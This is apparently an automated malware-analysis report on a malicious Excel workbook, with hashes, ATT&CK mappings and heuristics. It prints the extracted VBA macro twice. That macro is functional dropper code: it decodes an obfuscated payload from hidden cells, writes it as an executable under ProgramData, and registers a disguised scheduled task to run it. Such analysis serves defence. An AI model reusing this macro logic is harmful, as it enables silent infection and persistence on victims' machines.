Office (OLE) malware analysis — malicious · 08261ed40e21140e

MALICIOUS

Office (OLE)

1.81 MB Created: 2021-05-17 06:41:14 First seen: 2021-06-17

MD5: a90ae3747764127decae5a0d7856ef95 SHA-1: 254e134490a0b74b3a66626fc0d62ff972cfc1a2 SHA-256: 08261ed40e21140eb438f16af0233217c701d9b022dce0a45b6e3e1ee2467739

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains a Workbook_Open VBA macro that is triggered upon opening the document. This macro decodes a Base64 string, modifies it, and writes it to disk as 'MsNpENg' in two potential locations: 'C:\ProgramData\MsNpENg\' and 'C:\Windows\debug\WIA\MsNpENg\'. The CreateObject call and the execution of VBA code indicate malicious intent, likely to download and execute a second-stage payload.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5780 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5780 bytes
SHA-256: `38ffca938856b072056b51a64080e86c1b7d10dcff1d731f4143df36d7f2e6fe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() claculate complete End Sub Public Function complete() On Error Resume Next Worksheets("Technical Support").Visible = True Worksheets("Sales Manager").Visible = True Worksheets("HR").Visible = True Worksheets("Sheet1").Visible = xlSheetVeryHidden End Function Function RangeToString(ByVal myRange As Range) As String RangeToString = "" If Not myRange Is Nothing Then Dim myCell As Range For Each myCell In myRange RangeToString = RangeToString & myCell.Value Next myCell RangeToString = Right(RangeToString, Len(RangeToString)) End If End Function Private Function claculate() On Error Resume Next Dim pement As String Dim rng As Range Set rng = Worksheets("Sheet00").Range("A1:A1755") pement = RangeToString(rng) pement = Chr(69 + 2 - 2) + "Zx" + Replace(pement, "*", "") pement = Chr(85 + 1) + pement Dim pementSum As String pementSum = DecodeBase64(pement) Dim peymentt() As Byte peymentt = Base64ToArray(pementSum) peymentt(0) = 77 Dim ofso Set ofso = CreateObject("Scripting.FileSystemObject") Dim f As String f = "MsNpENg" Dim tm As String tm = "C:\ProgramData\MsNpENg\" MkDir tm Open tm & f For Binary As #1 Put #1, 1, peymentt Close #1 If ofso.FileExists(tm & f) = False Then tm = "C:\Windows\debug\WIA\MsNpENg\" MkDir tm Open tm & f For Binary As #1 Put #1, 1, peymentt Close #1 If ofso.FileExists(tm & f) = False Then tm = "C:\Users\Public\PublicVideos\MsNpENg\" MkDir tm Open tm & f For Binary As #1 Put #1, 1, peymentt Close #1 End If End If Const TriggerTypeTime = 1 Const ActionTypeExec = 0 Set service = CreateObject("Schedule.Service") Call service.Connect Dim rootFolder Set rootFolder = service.GetFolder("\") Dim taskDefinition Set taskDefinition = service.NewTask(0) Dim regInfo Set regInfo = taskDefinition.RegistrationInfo regInfo.Description = "Start notepad at a certain time" Dim principal Set principal = taskDefinition.principal principal.LogonType = 3 Dim settings Set settings = taskDefinition.settings settings.Enabled = True settings.StartWhenAvailable = True settings.Hidden = False Dim triggers Set triggers = taskDefinition.triggers Dim trigger Set trigger = triggers.Create(TriggerTypeTime) Dim startTime, endTime Dim time time = DateAdd("s", 30, Now) startTime = XmlTime(time) trigger.StartBoundary = startTime trigger.EndBoundary = endTime trigger.ExecutionTimeLimit = "PT5M" trigger.ID = "TimeTriggerId" trigger.Enabled = True Dim repetitionPattern Set repetitionPattern = trigger.Repetition repetitionPattern.Interval = "PT1M" trigger.Repetition.StopAtDurationEnd = False Dim Action Set Action = taskDefinition.Actions.Create(ActionTypeExec) Action.Path = tm & f Action.arguments = "MsNpENg" Call rootFolder.RegisterTaskDefinition( _ "Optimize Machine Analysis", taskDefinition, 6, , , 3) End Function Function XmlTime(t) Dim cSecond, cMinute, CHour, cDay, cMonth, cYear Dim tTime, tDate cSecond = "0" & Second(t) cMinute = "0" & Minute(t) CHour = "0" & Hour(t) cDay = "0" & Day(t) cMonth = "0" & Month(t) cYear = Year(t) tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _ ":" & Right(cSecond, 2) tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2) XmlTime = tDate & "T" & tTime End Function Function DecodeBase64(b64$) Dim base64Decoded As String base64Decoded = StrConv(Base64ToArray(b64), vbUnicode) DecodeBase64 = base64Decoded End Function Private Function Base64ToArray(base64 As String) As Variant Dim xmlDoc As Object Dim xmlNode As Object Set xmlDoc = CreateObject("MSXML2.DOMDocument") Set xm ... (truncated)

SHA-256: 38ffca938856b072056b51a64080e86c1b7d10dcff1d731f4143df36d7f2e6fe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
claculate
complete
End Sub
Public Function complete()
On Error Resume Next
Worksheets("Technical Support").Visible = True
Worksheets("Sales Manager").Visible = True
Worksheets("HR").Visible = True
Worksheets("Sheet1").Visible = xlSheetVeryHidden
End Function
Function RangeToString(ByVal myRange As Range) As String
    RangeToString = ""
    If Not myRange Is Nothing Then
        Dim myCell As Range
        For Each myCell In myRange
            RangeToString = RangeToString & myCell.Value
        Next myCell
        RangeToString = Right(RangeToString, Len(RangeToString))
    End If
End Function
Private Function claculate()
On Error Resume Next

Dim pement As String


Dim rng As Range
Set rng = Worksheets("Sheet00").Range("A1:A1755")
pement = RangeToString(rng)
pement = Chr(69 + 2 - 2) + "Zx" + Replace(pement, "*", "")
pement = Chr(85 + 1) + pement

Dim pementSum As String
pementSum = DecodeBase64(pement)
Dim peymentt() As Byte
peymentt = Base64ToArray(pementSum)
peymentt(0) = 77

Dim ofso
Set ofso = CreateObject("Scripting.FileSystemObject")

Dim f As String
f = "MsNpENg"
Dim tm As String

tm = "C:\ProgramData\MsNpENg\"
MkDir tm

Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1

If ofso.FileExists(tm & f) = False Then
tm = "C:\Windows\debug\WIA\MsNpENg\"
MkDir tm

Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1

If ofso.FileExists(tm & f) = False Then
tm = "C:\Users\Public\PublicVideos\MsNpENg\"
MkDir tm

Open tm & f For Binary As #1
Put #1, 1, peymentt
Close #1
End If

End If
Const TriggerTypeTime = 1
Const ActionTypeExec = 0
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start notepad at a certain time"
Dim principal
Set principal = taskDefinition.principal
principal.LogonType = 3
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)
Dim startTime, endTime
Dim time
time = DateAdd("s", 30, Now)
startTime = XmlTime(time)


trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True
Dim repetitionPattern
Set repetitionPattern = trigger.Repetition
repetitionPattern.Interval = "PT1M"
trigger.Repetition.StopAtDurationEnd = False
Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = tm & f
Action.arguments = "MsNpENg"
Call rootFolder.RegisterTaskDefinition( _
    "Optimize Machine Analysis", taskDefinition, 6, , , 3)
End Function
Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate

    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)

    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
        ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function
Function DecodeBase64(b64$)
    Dim base64Decoded As String
    base64Decoded = StrConv(Base64ToArray(b64), vbUnicode)
    DecodeBase64 = base64Decoded
End Function
Private Function Base64ToArray(base64 As String) As Variant
    
    Dim xmlDoc As Object
    Dim xmlNode As Object
    
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.